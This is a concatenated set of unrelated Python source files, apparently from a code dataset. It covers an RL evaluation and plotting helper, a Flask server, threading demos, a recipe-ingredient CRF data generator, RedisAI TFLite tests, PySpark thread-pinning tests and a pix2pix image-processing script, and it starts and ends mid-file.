print(f"{self.agent_id:<2} {self.total_step:8.2e} {self.r_max:8.2f} |") # save policy and print
self.recorder.append((self.total_step, r_avg, r_std, obj_a, obj_c)) # update recorder
if_reach_goal = bool(self.r_max > self.target_return) # check if_reach_goal
if if_reach_goal and self.used_time is None:
self.used_time = int(time.time() - self.start_time)
print(f"{'ID':>2} {'Step':>8} {'TargetR':>8} |"
f"{'avgR':>8} {'stdR':>8} {'UsedTime':>8} ########\n"
f"{self.agent_id:<2} {self.total_step:8.2e} {self.target_return:8.2f} |"
f"{r_avg:8.2f} {r_std:8.2f} {self.used_time:>8} ########")
print(f"{self.agent_id:<2} {self.total_step:8.2e} {self.r_max:8.2f} |"
f"{r_avg:8.2f} {r_std:8.2f} {obj_a:8.2f} {obj_c:8.2f} |"
f"{s_avg:6.0f} {s_std:4.0f}")
else:
if_reach_goal = False
return if_reach_goal
def draw_plot(self):
if len(self.recorder) == 0:
print("| save_npy_draw_plot() WARNNING: len(self.recorder)==0")
return None
'''convert to array and save as npy'''
np.save('%s/recorder.npy' % self.cwd, self.recorder)
'''draw plot and save as png'''
train_time = int(time.time() - self.start_time)
total_step = int(self.recorder[-1][0])
save_title = f"plot_step_time_maxR_{int(total_step)}_{int(train_time)}_{self.r_max:.3f}"
save_learning_curve(self.recorder, self.cwd, save_title)
@staticmethod
def get_r_avg_std_s_avg_std(rewards_steps_list):
rewards_steps_ary = np.array(rewards_steps_list)
r_avg, s_avg = rewards_steps_ary.mean(axis=0) # average of episode return and episode step
r_std, s_std = rewards_steps_ary.std(axis=0) # standard dev. of episode return and episode step
return r_avg, r_std, s_avg, s_std
def get_episode_return(env, act, device) -> (float, int):
episode_return = 0.0 # sum of rewards in an episode
episode_step = 1
max_step = env.max_step
if_discrete = env.if_discrete
state = env.reset()
for episode_step in range(max_step):
s_tensor = torch.as_tensor((state,), device=device)
a_tensor = act(s_tensor)
if if_discrete:
a_tensor = a_tensor.argmax(dim=1)
action = a_tensor.cpu().numpy()[0] # not need detach(), because with torch.no_grad() outside
state, reward, done, _ = env.step(action)
episode_return += reward
if done:
break
episode_return = getattr(env, 'episode_return', episode_return)
return episode_return, episode_step + 1
def save_learning_curve(recorder, cwd='.', save_title='learning curve'):
recorder = np.array(recorder) # recorder_ary.append((self.total_step, r_avg, r_std, obj_a, obj_c))
steps = recorder[:, 0] # x-axis is training steps
r_avg = recorder[:, 1]
r_std = recorder[:, 2]
obj_a = recorder[:, 3]
obj_c = recorder[:, 4]
'''plot subplots'''
import matplotlib as mpl
mpl.use('Agg')
"""Generating matplotlib graphs without a running X server [duplicate]
write `mpl.use('Agg')` before `import matplotlib.pyplot as plt`
https://stackoverflow.com/a/4935945/9293137
"""
import matplotlib.pyplot as plt
fig, axs = plt.subplots(2)
axs0 = axs[0]
axs0.cla()
color0 = 'lightcoral'
axs0.set_xlabel('Total Steps')
axs0.set_ylabel('Episode Return')
axs0.plot(steps, r_avg, label='Episode Return', color=color0)
axs0.fill_between(steps, r_avg - r_std, r_avg + r_std, facecolor=color0, alpha=0.3)
ax11 = axs[1]
ax11.cla()
color11 = 'royalblue'
axs0.set_xlabel('Total Steps')
ax11.set_ylabel('objA', color=color11)
ax11.plot(steps, obj_a, label='objA', color=color11)
ax11.tick_params(axis='y', labelcolor=color11)
ax12 = axs[1].twinx()
color12 = 'darkcyan'
ax12.set_ylabel('objC', color=color12)
ax12.fill_between(steps, obj_c, facecolor=color12, alpha=0.2, )
ax12.tick_params(axis='y', labelcolor=color12)
'''plot save'''
plt.title(save_title, y=2.3)
plt.savefig(f"{cwd}/plot_learning_curve.jpg")
plt.close('all') # avoiding warning about too many open figures, rcParam `figure.max_open_warning`
# plt.show() # if use `mpl.use('Agg')` to draw figures without GUI, then plt can't plt.show()
def explore_before_training(env, buffer, target_step, reward_scale, gamma) -> int:
# just for off-policy. Because on-policy don't explore before training.
if_discrete = env.if_discrete
action_dim = env.action_dim
state = env.reset()
steps = 0
while steps < target_step:
action = rd.randint(action_dim) if if_discrete else rd.uniform(-1, 1, size=action_dim)
next_state, reward, done, _ = env.step(action)
steps += 1
scaled_reward = reward * reward_scale
mask = 0.0 if done else gamma
other = (scaled_reward, mask, action) if if_discrete else (scaled_reward, mask, *action)
buffer.append_buffer(state, other)
state = env.reset() if done else next_state
return steps
|
server.py
|
from flask import Flask, redirect, url_for, render_template
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return render_template('index.html')
def run():
app.run(host='0.0.0.0', port=8080)
def server():
server = Thread(target=run)
server.start()
|
create_threads.py
|
#!/usr/bin/python
# This multithreading program creates five threads
# and each thread prints "Hello World" with a two-second interval
import threading
import time
def HelloWorld():
"""User defined Thread function"""
print("Hello World")
return
def Main():
threads = [] # Threads list needed when we use a bulk of threads
print("Program started. This program will print Hello World five times...")
for i in range(5):
mythread = threading.Thread(target=HelloWorld)
threads.append(mythread)
time.sleep(2)
mythread.start()
print("Done! Program ended")
if __name__ == "__main__":
Main()
|
cli.py
|
from __future__ import print_function
import re
import decimal
import argparse
import pandas as pd
from multiprocessing import Pool, TimeoutError, Queue, Process, Manager
from Queue import Empty
import utils
class Cli(object):
def __init__(self, argv):
self.opts = self._parse_args(argv)
self._upstream_cursor = None
m = Manager()
self.output_queue = m.Queue()
def run(self):
self.generate_data(self.opts.count, self.opts.offset, self.opts.threads)
def generate_data(self, count, offset, threads):
"""
Generates training data in the CRF++ format for the ingredient
tagging task
"""
df = pd.read_csv(self.opts.data_path)
df = df.fillna("")
start = offset
end = offset + count
df_slice = df.iloc[start: end]
qr = Process(target=self.start_queue_reader)
qr.start()
worker_pool = Pool(processes=threads or None)
worker_pool.map_async(self._generate_data_worker, df_slice.iterrows())
worker_pool.close()
worker_pool.join()
self.output_queue.put('DONE')
qr.join()
def _generate_data_worker(self, args):
index, row = args
out = []
try:
# extract the display name
display_input = utils.cleanUnicodeFractions(row["input"])
tokens = utils.tokenize(display_input)
del(row["input"])
rowData = self.addPrefixes([(t, self.matchUp(t, row)) for t in tokens])
for i, (token, tags) in enumerate(rowData):
features = utils.getFeatures(token, i+1, tokens)
out.append(utils.joinLine([token] + features + [self.bestTag(tags)]))
# ToDo: deal with this
except UnicodeDecodeError:
pass
if out:
self.output_queue.put('\n'.join(out))
def start_queue_reader(self):
o = None
while o != 'DONE':
try:
o = self.output_queue.get()
if o != 'DONE':
print(o, end="\n\n", flush=True)
except Empty:
pass
def parseNumbers(self, s):
"""
Parses a string that represents a number into a decimal data type so that
we can match the quantity field in the db with the quantity that appears
in the display name. Rounds the result to 2 places.
"""
ss = utils.unclump(s)
m3 = re.match('^\d+$', ss)
if m3 is not None:
return decimal.Decimal(round(float(ss), 2))
m1 = re.match(r'(\d+)\s+(\d)/(\d)', ss)
if m1 is not None:
num = int(m1.group(1)) + (float(m1.group(2)) / float(m1.group(3)))
return decimal.Decimal(str(round(num,2)))
m2 = re.match(r'^(\d)/(\d)$', ss)
if m2 is not None:
num = float(m2.group(1)) / float(m2.group(2))
return decimal.Decimal(str(round(num,2)))
return None
def matchUp(self, token, ingredientRow):
"""
Returns our best guess of the match between the tags and the
words from the display text.
This problem is difficult for the following reasons:
* not all the words in the display name have associated tags
* the quantity field is stored as a number, but it appears
as a string in the display name
* the comment is often a compilation of different comments in
the display name
"""
ret = []
# strip parens from the token, since they often appear in the
# display_name, but are removed from the comment.
token = utils.normalizeToken(token)
decimalToken = self.parseNumbers(token)
for key, val in ingredientRow.iteritems():
if isinstance(val, basestring):
for n, vt in enumerate(utils.tokenize(val)):
if utils.normalizeToken(vt) == token:
ret.append(key.upper())
elif decimalToken is not None:
try:
if val == decimalToken:
ret.append(key.upper())
except:
pass
return ret
def addPrefixes(self, data):
"""
We use BIO tagging/chunking to differentiate between tags
at the start of a tag sequence and those in the middle. This
is a common technique in entity recognition.
Reference: http://www.kdd.cis.ksu.edu/Courses/Spring-2013/CIS798/Handouts/04-ramshaw95text.pdf
"""
prevTags = None
newData = []
for n, (token, tags) in enumerate(data):
newTags = []
for t in tags:
p = "B" if ((prevTags is None) or (t not in prevTags)) else "I"
newTags.append("%s-%s" % (p, t))
newData.append((token, newTags))
prevTags = tags
return newData
def bestTag(self, tags):
if len(tags) == 1:
return tags[0]
# if there are multiple tags, pick the first which isn't COMMENT
else:
for t in tags:
if (t != "B-COMMENT") and (t != "I-COMMENT"):
return t
# we have no idea what to guess
return "OTHER"
def _parse_args(self, argv):
"""
Parse the command-line arguments into a dict.
"""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--count", default=100, type=int, help=' ')
parser.add_argument("--offset", default=0, type=int, help=' ')
parser.add_argument("--threads", default=0, type=int, help=' ')
parser.add_argument("--data-path", default="nyt-ingredients-snapshot-2015.csv", help=' ')
return parser.parse_args(argv)
|
two-tasks.py
|
#!/usr/bin/env python
"""
Two progress bars that run in parallel.
"""
import threading
import time
from quo.progress import ProgressBar
def main():
with ProgressBar(title="Two tasks") as pb:
# Two parallal tasks.
def task_1():
for i in pb(range(100)):
time.sleep(0.05)
def task_2():
for i in pb(range(150)):
time.sleep(0.08)
# Start threads.
t1 = threading.Thread(target=task_1)
t2 = threading.Thread(target=task_2)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in [t1, t2]:
while t.is_alive():
t.join(timeout=0.5)
if __name__ == "__main__":
main()
|
tests_tflite.py
|
import numpy as np
from includes import *
'''
python -m RLTest --test tests_tflite.py --module path/to/redisai.so
'''
def test_run_tflite_model(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
env.assertEqual(ret[5], b'')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU', 'TAG', 'asdf', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
env.assertEqual(ret[5], b'asdf')
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
# TODO: enable me. CI is having issues on GPU asserts of TFLITE and CPU
if DEVICE == "CPU":
env.assertEqual(ret[1], b'TFLITE')
env.assertEqual(ret[3], b'CPU')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 2, 'b{1}', 'c{1}')
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
env.assertEqual(values[0], 1)
def test_run_tflite_model_autobatch(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('lite-model_imagenet_mobilenet_v3_small_100_224_classification_5_default_1.tflite')
_, _, _, img = load_resnet_test_data()
img = img.astype(np.float32) / 255
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU',
'BATCHSIZE', 4, 'MINBATCHSIZE', 2,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
if DEVICE == "CPU":
env.assertEqual(ret[1], b'TFLITE')
env.assertEqual(ret[3], b'CPU')
ret = con.execute_command('AI.TENSORSET', 'a{1}',
'FLOAT', 1, img.shape[1], img.shape[0], 3,
'BLOB', img.tobytes())
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'b{1}',
'FLOAT', 1, img.shape[1], img.shape[0], 3,
'BLOB', img.tobytes())
env.assertEqual(ret, b'OK')
def run():
con = get_connection(env, '{1}')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1,
'b{1}', 'OUTPUTS', 1, 'd{1}')
ensureSlaveSynced(con, env)
t = threading.Thread(target=run)
t.start()
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'c{1}')
t.join()
ensureSlaveSynced(con, env)
c_values = np.array(con.execute_command('AI.TENSORGET', 'c{1}', 'VALUES'), dtype=np.float32)
c_idx = np.argmax(c_values)
d_values = np.array(con.execute_command('AI.TENSORGET', 'd{1}', 'VALUES'), dtype=np.float32)
d_idx = np.argmax(d_values)
env.assertEqual(c_idx, d_idx)
env.assertFalse(np.isnan(c_values[c_idx]))
env.assertFalse(np.isinf(c_values[c_idx]))
def test_run_tflite_errors(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
wrong_model_pb = load_file_content('graph.pb')
ret = con.execute_command('AI.MODELSTORE', 'm_2{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
check_error_message(env, con, "Failed to load model from buffer",
'AI.MODELSTORE', 'm{1}', 'TFLITE', 'CPU', 'TAG', 'asdf', 'BLOB', wrong_model_pb)
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
check_error_message(env, con, "Number of keys given as OUTPUTS here does not match model definition",
'AI.MODELEXECUTE', 'm_2{1}', 'INPUTS', 1, 'EMPTY_INPUT{1}', 'OUTPUTS', 1, 'EMPTY_OUTPUT{1}')
check_error_message(env, con, "Number of keys given as INPUTS here does not match model definition",
'AI.MODELEXECUTE', 'm_2{1}', 'INPUTS', 3, 'a{1}', 'b{1}', 'c{1}', 'OUTPUTS', 1, 'd{1}')
model_pb = load_file_content('lite-model_imagenet_mobilenet_v3_small_100_224_classification_5_default_1.tflite')
_, _, _, img = load_resnet_test_data()
ret = con.execute_command('AI.MODELSTORE', 'image_net{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'dog{1}', 'UINT8', 1, img.shape[1], img.shape[0], 3,
'BLOB', img.tobytes())
env.assertEqual(ret, b'OK')
# The model expects FLOAT input, but UINT8 tensor is given.
check_error_message(env, con, "Input tensor type doesn't match the type expected by the model definition",
'AI.MODELEXECUTE', 'image_net{1}', 'INPUTS', 1, 'dog{1}', 'OUTPUTS', 1, 'output{1}')
def test_tflite_modelinfo(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
if DEVICE == "GPU":
env.debugPrint("skipping {} since it's hanging CI".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
previous_duration = 0
for call in range(1, 10):
ret = con.execute_command('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 2, 'b{1}', 'c{1}')
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
info = con.execute_command('AI.INFO', 'mnist{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['key'], 'mnist{1}')
env.assertEqual(info_dict_0['type'], 'MODEL')
env.assertEqual(info_dict_0['backend'], 'TFLITE')
env.assertEqual(info_dict_0['device'], DEVICE)
env.assertTrue(info_dict_0['duration'] > previous_duration)
env.assertEqual(info_dict_0['samples'], call)
env.assertEqual(info_dict_0['calls'], call)
env.assertEqual(info_dict_0['errors'], 0)
previous_duration = info_dict_0['duration']
res = con.execute_command('AI.INFO', 'mnist{1}', 'RESETSTAT')
env.assertEqual(res, b'OK')
info = con.execute_command('AI.INFO', 'mnist{1}')
info_dict_0 = info_to_dict(info)
env.assertEqual(info_dict_0['duration'], 0)
env.assertEqual(info_dict_0['samples'], 0)
env.assertEqual(info_dict_0['calls'], 0)
env.assertEqual(info_dict_0['errors'], 0)
def test_tflite_modelrun_disconnect(env):
if not TEST_TFLITE:
env.debugPrint("skipping {} since TEST_TFLITE=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ret = con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = send_and_disconnect(('AI.MODELEXECUTE', 'mnist{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 2, 'b{1}', 'c{1}'), con)
env.assertEqual(ret, None)
def test_tflite_model_rdb_save_load(env):
env.skipOnCluster()
if env.useAof or not TEST_TFLITE:
env.debugPrint("skipping {}".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist_model_quant.tflite')
ret = con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
model_serialized_memory = con.execute_command('AI.MODELGET', 'mnist{1}', 'BLOB')
ensureSlaveSynced(con, env)
ret = con.execute_command('SAVE')
env.assertEqual(ret, True)
env.stop()
env.start()
con = get_connection(env, '{1}')
model_serialized_after_rdbload = con.execute_command('AI.MODELGET', 'mnist{1}', 'BLOB')
env.assertEqual(len(model_serialized_memory), len(model_serialized_after_rdbload))
env.assertEqual(len(model_pb), len(model_serialized_after_rdbload))
# Assert in memory model binary is equal to loaded model binary
env.assertTrue(model_serialized_memory == model_serialized_after_rdbload)
# Assert input model binary is equal to loaded model binary
env.assertTrue(model_pb == model_serialized_after_rdbload)
def test_tflite_info(env):
if not TEST_TFLITE:
env.debugPrint("skipping {}".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
backends_info = get_info_section(con, 'backends_info')
env.assertFalse('ai_TensorFlowLite_version' in backends_info)
model_pb = load_file_content('mnist_model_quant.tflite')
con.execute_command('AI.MODELSTORE', 'mnist{1}', 'TFLITE', 'CPU', 'BLOB', model_pb)
backends_info = get_info_section(con, 'backends_info')
env.assertTrue('ai_TensorFlowLite_version' in backends_info)
|
test_pin_thread.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import time
import threading
import unittest
from pyspark import SparkContext, SparkConf, InheritableThread
class PinThreadTests(unittest.TestCase):
# These tests are in a separate class because it uses
# 'PYSPARK_PIN_THREAD' environment variable to test thread pin feature.
@classmethod
def setUpClass(cls):
cls.old_pin_thread = os.environ.get("PYSPARK_PIN_THREAD")
os.environ["PYSPARK_PIN_THREAD"] = "true"
cls.sc = SparkContext('local[4]', cls.__name__, conf=SparkConf())
@classmethod
def tearDownClass(cls):
cls.sc.stop()
if cls.old_pin_thread is not None:
os.environ["PYSPARK_PIN_THREAD"] = cls.old_pin_thread
else:
del os.environ["PYSPARK_PIN_THREAD"]
def test_pinned_thread(self):
threads = []
exceptions = []
property_name = "test_property_%s" % PinThreadTests.__name__
jvm_thread_ids = []
for i in range(10):
def test_local_property():
jvm_thread_id = self.sc._jvm.java.lang.Thread.currentThread().getId()
jvm_thread_ids.append(jvm_thread_id)
# If a property is set in this thread, later it should get the same property
# within this thread.
self.sc.setLocalProperty(property_name, str(i))
# 5 threads, 1 second sleep. 5 threads without a sleep.
time.sleep(i % 2)
try:
assert self.sc.getLocalProperty(property_name) == str(i)
# Each command might create a thread in multi-threading mode in Py4J.
# This assert makes sure that the created thread is being reused.
assert jvm_thread_id == self.sc._jvm.java.lang.Thread.currentThread().getId()
except Exception as e:
exceptions.append(e)
threads.append(threading.Thread(target=test_local_property))
for t in threads:
t.start()
for t in threads:
t.join()
for e in exceptions:
raise e
# Created JVM threads should be 10 because Python thread are 10.
assert len(set(jvm_thread_ids)) == 10
def test_multiple_group_jobs(self):
# SPARK-22340 Add a mode to pin Python thread into JVM's
group_a = "job_ids_to_cancel"
group_b = "job_ids_to_run"
threads = []
thread_ids = range(4)
thread_ids_to_cancel = [i for i in thread_ids if i % 2 == 0]
thread_ids_to_run = [i for i in thread_ids if i % 2 != 0]
# A list which records whether job is cancelled.
# The index of the array is the thread index which job run in.
is_job_cancelled = [False for _ in thread_ids]
def run_job(job_group, index):
"""
Executes a job with the group ``job_group``. Each job waits for 3 seconds
and then exits.
"""
try:
self.sc.setJobGroup(job_group, "test rdd collect with setting job group")
self.sc.parallelize([15]).map(lambda x: time.sleep(x)).collect()
is_job_cancelled[index] = False
except Exception:
# Assume that exception means job cancellation.
is_job_cancelled[index] = True
# Test if job succeeded when not cancelled.
run_job(group_a, 0)
self.assertFalse(is_job_cancelled[0])
# Run jobs
for i in thread_ids_to_cancel:
t = threading.Thread(target=run_job, args=(group_a, i))
t.start()
threads.append(t)
for i in thread_ids_to_run:
t = threading.Thread(target=run_job, args=(group_b, i))
t.start()
threads.append(t)
# Wait to make sure all jobs are executed.
time.sleep(3)
# And then, cancel one job group.
self.sc.cancelJobGroup(group_a)
# Wait until all threads launching jobs are finished.
for t in threads:
t.join()
for i in thread_ids_to_cancel:
self.assertTrue(
is_job_cancelled[i],
"Thread {i}: Job in group A was not cancelled.".format(i=i))
for i in thread_ids_to_run:
self.assertFalse(
is_job_cancelled[i],
"Thread {i}: Job in group B did not succeeded.".format(i=i))
def test_inheritable_local_property(self):
self.sc.setLocalProperty("a", "hi")
expected = []
def get_inner_local_prop():
expected.append(self.sc.getLocalProperty("b"))
def get_outer_local_prop():
expected.append(self.sc.getLocalProperty("a"))
self.sc.setLocalProperty("b", "hello")
t2 = InheritableThread(target=get_inner_local_prop)
t2.start()
t2.join()
t1 = InheritableThread(target=get_outer_local_prop)
t1.start()
t1.join()
self.assertEqual(self.sc.getLocalProperty("b"), None)
self.assertEqual(expected, ["hi", "hello"])
if __name__ == "__main__":
import unittest
from pyspark.tests.test_pin_thread import * # noqa: F401
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("/opt/caffe/examples/hed/deploy.prototxt", "/opt/caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, *src.shape)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src -= np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
